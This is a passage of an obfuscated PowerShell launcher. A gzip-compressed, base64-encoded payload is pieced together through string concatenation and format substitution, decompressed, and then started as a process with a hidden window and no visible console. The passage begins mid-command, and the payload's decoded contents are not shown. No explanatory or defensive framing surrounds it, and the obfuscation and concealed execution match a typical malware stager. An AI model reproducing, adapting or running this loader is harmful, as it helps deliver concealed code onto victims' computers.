System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAAO252MCA7VYaW+jSBr+PtL8B2sUKY42nXDYmclII62xOYwNNkcVRzZaYapijuIIYBuYnf++hRN39+x0z/auNHy''+''BKt6rnv{1}5i3p''+''5OeRhExf56PVhLo1+/f670fu1DaogG42viuPt6Kr/C{1}c3n95{1}hX''+''kx+mU''+''0fpqV5aLIgjh//vnn+aGqcN68je9k3MzqGmc7EuN6fDP618iJcIU/bHYJDpvRr6Orf97JpNgF5F2s''+''mw{1}hhEcfZjka3q2LMBjiurNKEjfj63/84/rm6QP7fCe+HgJSj6+trm5w{1}ocIub4Z/XYzOLS7Eo+vtTisirp4ae6cOOe5O5DXwQvWqbUj1nATFai+pmv5tJoKN4cqPy9qsPImM76mj''+''9uqCGcIVbiur29HT4P9p+fnv4+f3p2bh7yJM3y3zBtcFaWFq2Mc4vpOCXJEsIlfnqmW1VRxvn++uaFixyLF46v8QMjt''+''6H8xM9bx6QL{1}tyqNP1eiUtumurmlCf3jMrUCHQh+U7z+QpyUAzf0uvCAgvfbgN/LhTo7Dy{1}foM6nicv1{1}H6DacDjbVHHZ+VfRsztSKO+g6aoOjq8sqsDvnn+CPfoKmpvv9UWe1GkavmWTOjUEy''+''xi9PzJwO9yf5W7P4mD0N''+''eZvMAvcY4XXR5kcXgh6/hLGcEvBJ8RubuI6TTC8fX7C4wWmOB90AwgD8T4g5qYxc1HXeEQE4SrWUizWtOoaMJvfh/MW''+''97G18tcwxkF721MmXr1QksEX6Tfy6K''+''7eB/GVOh6ToK6vh1tD7RGw9uRhQOC0e1oltfx+6vZoSnOj9efwtUOpInDoG4u5p5v/gPO{1}7fzIq+b6hDStFII''+''bKvEYRyQAZHbkRIjLHRWvL+4v/4iHvOAEFo71NKR5oPODDhYzUCWikZKiXFzZ+FmmZUEZ1TivGNIJNjT/eG9Ps7cCvYYXX8lzEs{1}vJF+wOUCyG{1}B0mRbpGhuRzCuGrr/DBgP9Po/YvjjvnMOZl7h99SML/X1JHTNUABX+/kq''+''Hjj6DtAZjqqhUEhVkQlBjR8mb5vM+I{1}7MV5Mt4viNKOXKJkGFCwA/aWGVGItG8sT4zWIomXMLv''+''{1}03AFxv22Y''+''cmXbimotlFm1aKOX2bJeiorQGawwC5X4R6gKAFC9eL42knY5Q/P1frmnDoRlFAqMz+wFRpqvLSESY2a2twzFmLD+8v''+''4nIsS9tbRmivPR/ke74mSiuK090zV1FkkbJLGc{1}NZPB30/l{1}cL8TwOh7Hh1WIsUj+i5Bkwwg4sBUeUfAOW''+''y/3fTnsDru8nUiTQ+WXcrkt4Ty+WXR724uxyWUtOnxl0LMoPmtcco/t7eLifswXxh''+''cNrAI8+f8+CeNHO9z8J+Wm13x73yHB+NFu923HFzAGyyh3vYSg/8r6r9oEM6918SrAM9mtnegznswZ1QhE4Zu''+''o7k/PcLkvpHZ6WsjoNZakPu1msxtEu5PQucAXGy9qjxzVok5RJmMEIyaBYiVOCOnbrUUp5vLEHPOmRDJt1SrZrojOD3A6qxHNMEsbRxnfDxubUV9/RmaWkT0PeJDtrqtr{1}{1}LHj2BOV70OOHHfxVMEZOQHe7HxHalbzP9XVfYc9hjmxkTL4Yoq11NjY1RnfYQ4G93hAGeyQxDxsUp/iw849Vy{1}6Yg7y5S4Li9V8n1sLs7eAJNj9ktXyun0BuqBD33Gk8Oil0wIk6VSPawb30q''+''MtqTJwWGD0kRMq+kIH6o+awh4o3lvDUTXIS5ottzykvN65amvzZmpwjaWBZhJkOljzfgRSmEE52oZMCYFi9sECEUfeMzpfn15Ay''+''FqMZOIcWlB''+''Bc91V57asMU5etCZMOXOhtYhpA58PK''+''wPoB''+''gLTZiMib8WYDxYwc931U5MrjlD001BUTS3fV9CFsaMQAlz/FSRkAqDEIADyVYeOkC2G+6sP{1}ei5qAcpzWJGTxPEtzye8i{1}tH2xFJyYH6ecG0BwDBjkis1MEFlLfPixNX24zExCKF/HUrs5hQh6ALa0D2etDnixALk0g9F1HCZm{1}w3Y2Lyx9fl9RBrJGWiaaWJ88rnzVs6YCttcbqcYbrO56TGSZjs8juVwbaTMFmW5qVlipvM4ZQDJWjHek26wHWWMSOuEU9lGCe+FRZwUGAjTHTs35rvCKEsQBptwiybcxUB8AJ/a2aLRoTm1xWuW4fkzzQAymtQKF5sBVXzXXh2F2as3MO+O0443hvtV4Ic{1}SNA+Z1rUIf''+''A3T5jXsqJ1e4yx''+''+OTFS5GCZNUzG9AA3Ya0+mkCFBCvuM{1}O5xxVOC27{1}G9zAJZAvK8Br7caq+ZAzWcvWeA1GLeTQxufVE3ZNBS0E{1}beQ3J0ibSFbHpGColCUZLggh52y5BBZUq4bbZATBnEG45851EyAC1Naf4xpm5''+''s155+womsGD/kg208Mjm''+''HCril0kcY6xLEQ/OGuw8gzHVak2L{1}QPPVWikQ/gRsfFiwgBa+lMAkS/6AzSIKsGq1ZSfWhsLDFokWJHgE+ygIeRgCotsfve40xpr7MHvXus{1}Y''+''WphU6Rr{1}LxC6QygebM3nPmfaaM83X/OwUUP4DntaeE3WOnR7XjHjSmIilnlyQSFsrR5HGqK3BoX431KgLM62PMjrfwEQiIJk{1}N7ZeY2nWeYnXogWEXmpOjETtfZE0HoemIYC9nbW5BvVGU0xXl30w8MVMxYkjl6zv6qo/f5TPWLAlPWn6cyuLkpBIHBRV{1}gOgimSN38nGBKWmD9Jybs0fGyjCiiLFO1Bvfam0''+''{1}xJRaZVoKPU9KyVKIKmxThlp52S16n3JTmgtyOEUZ+JpB0zfywfO0XOtzHSWFK3t3txsFMgGGTwGiQ4cSa8cq67gwvfChW9iF2oe1AGWvImlCFtrAY4wLztayxXFvwW5HkG59XZMubAXsAsVoR/qUnPVKMweoa''+''U''+''Y5zFIAYcot8xEau3UFzXHH/YySHOeW1DQ{1}M48ha7InXUpAh4vVp7tH+w3/BPHiSozg2xoowiLPglY5AQLqFmwLExl2''+''EfhfMWj3GSkxkzMlc2xtaa''+''EFU5DDmWti7pGAQvfR04U0EV6Gq9uIB9Zeq+uh7wEiVBZSsloUsgiWzpBut/Z8qMFpYjRSARMImx2vS7a{1}M8Nc6T6mZ8FeS''+''RaCSpAr0om49vhwphgJRKCTBKgKwgUx6GOCye{1}royhVhyvQwkBaxZ1tqTz''+''WEQBBO1GWwj''+''mxg1PFMPekkppwMBw2sDKpW2ooNQWp0EgRYkDCkaTI8{1}kTr3Zm2tbVntIR1pe9loSGWuexIj3H3aJwSMRcV5KOuorgQv0ANyU7j3G1MigQWOge3b76iy8o0PMZcjuuUCBRycXDnqiQwwibwN9bi{1}73EYpmx0Mp6ENpitejTcS9a8gNmR0wQBivrLYTOXSfD1Hutql5cpKa4f902/u78cpe/RlOHzvRfrNPe5coaO10VM75Zqcv+lgx8CDP98PtuPZ7J''+''{1}ffqAHwicQ5w3PPV+lFLL90DR9/93V3vrsVPi1flALqjoKCD0t0k7vcmaXikp67962RTxojMfnHwAprnJMaN''+''{1}M++rLYX{1}GSBEOreO5z6Nt61szOfS2YHmO6ktPN6OPgjefesrL1M8/+zRKenwezrZ3a5zvm+iWaXmGo{1}0g0zKT80n529c2L8pufDZ2O/STFJqLbXK2Tc3FL6Px+K9Ha1sVDW1fvo7X16CjvlPab9D2560LGAAUioJ8Dt95XR+58Dl2FDSWLvx''+''p+FvwRhJq4AN+HV01Qzv9eXt+RXbeX0uc92Ymojf034jzae5P3n4TmZjbAZ4/TP5+4rMu8C8EwAnihkpatCcj+O0vwZ{1}xeK+VzzJMk0ML4eX9Gn6cbQ7NB/1AyLkt/DfJpg5msBMAAA{0}{0}'')-f''='',''d'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"